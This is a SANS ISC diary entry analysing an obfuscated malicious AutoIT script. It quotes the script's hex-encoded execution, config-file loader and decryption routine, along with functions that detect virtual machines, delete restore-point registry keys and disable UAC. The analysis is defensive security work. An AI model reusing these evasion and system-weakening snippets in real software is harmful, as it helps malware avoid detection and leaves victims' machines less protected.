Diving into Malicious AutoIT Code, (Tue, Oct 23rd)

Following my yesterday diary[1], I had a deeper look at the malicious AutoIT script dropped in my sandbox. For those who are not aware of AutoIT, it is a BASIC-like scripting language designed for automating Windows tasks. If scripts can be very simple, they can also interact with any feature of the operating system.

The analyzed script has the following SHA256 hash: d5a8cdc7ae6a49233ee021a39f12ef61c630202f68edc3a7d64fd1b616704d8d and is still unknown on VT when writing this diary. The script uses different obfuscation techniques like:

Long random variable names:

$9355FBBA246C8217C04EE3075C218909 = @TempDir & "\" & $989BD8DF7434150DDDCC4E3AF84571E3

Hex-encoded portions of the script:

Execute(BinaryToString("0x536C656570283130303029”))

Which, decoded, executes: 

Sleep(1000)

Unused parameters, parameters or lines of code duplication

The script loads and executes a portion of code from external files:

$F2EE618C99E95AD0E9BB8DA5F76EE4DC = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "AuEx", ‘')
Run($9355FBBA246C8217C04EE3075C218909 & "\" & $1B6FE00D126CF844740F878410AD34F2 & " " & FileGetShortName($9355FBBA246C8217C04EE3075C218909 & "\" & $F2EE618C99E95AD0E9BB8DA5F76EE4DC))

The script reads a configuration file (“qut.docx”) that is also obfuscated with many comments. Once cleaned, we have this:

[Setting]
HDX_Keys=433643363536343446464534374330344533414641454339363134443445433237354544314642383532364332463738
Keys=trx
Dir=33623513
Key=qwertyjhgfdsdfgh.exe
AuEx=ehm=ogk
ExEc=whr.exe
StartUps=iud-5aZXL77H7wIRrA22S74M7C
9up16HX9UB55B7W410G0j9C[Data]0x3818ACFFD2E13CD58F7
….. [eData]29UoXR9414z3A158ZcBCn3o62R0OKP5G3FO8G479nj5j4WPus
RP=jog.rln
sK=846
sN=dng.snk
inc=itu.wjf
GLx70j31N9Y7jJDow465116a863g57S13dq290813801Rqp1y95S63R[s

Note the presence of “[Data]” and “[eData]”. The code between them is extracted and decrypted (the code has been beautified):

Func _S0xB90F6847EC557E33AF45D188DF40E553($6041FCAD8A4EB8C30A147D795679C7FA) $key = IniRead($docxConfigFile, "Setting", "Keys", '') Global $fhandle = FileRead($docxConfigFile) $buffer = f_extract_string($fhandle, "[Data]", "[eData]") $fhandle = $buffer[0] $fhandle = f_decrypt($fhandle, $key, 0x00006602) $47AAAA106EEBB77E0556A0111B63ED18 = _S0xA011B5402E3FD470217B241163CA15BB() _S0x5498F30D3302580A94D5B06B04E62B42($fhandle, "", $47AAAA106EEBB77E0556A0111B63ED18)
EndFunc 

The script also implements analysis detection techniques (again beautified):

Func f_detectvm() $_E0x456DAE09D320D97B2AE45304623B4B9C = "VMwaretray.exe" $_E0x7C94F3C4E05A0676BD34966A4E247A02 = "Vbox.exe" If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then Exit EndIf If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then Exit EndIf If ProcessExists("VBoxTray.exe") Or ProcessExists("VBo" & "xServ" & "ice.exe") Or ProcessExists("vpcmap.exe") Or ProcessExists("vpcmap.exe") Then Exit EndIf If ProcessExists($_E0x456DAE09D320D97B2AE45304623B4B9C) Then Exit EndIf If ProcessExists($_E0x7C94F3C4E05A0676BD34966A4E247A02) Then Exit EndIf
EndFunc Func f_disable_restore_points() If FileExists(@ScriptDir & "\ini") Then Else RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients") FileWrite(@ScriptDir & "\ini", "") EndIf
EndFunc Func f_disable_lua() $lua = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If Not ($lua = "0") Then RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0") EndIf
EndFunc 

It has many similarities with another script that I analyzed a few months ago[2]. There is plenty of code present in the script (hex-encoded) that is injected into other processes but I don’t know yet the purpose of this code.

[1] https://isc.sans.edu/forums/diary/Malicious+Powershell+using+a+Decoy+Picture/24234/
[2] https://isc.sans.edu/forums/diary/Malicious+AutoIT+script+delivered+in+a+selfextracting+RAR+file/22756/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key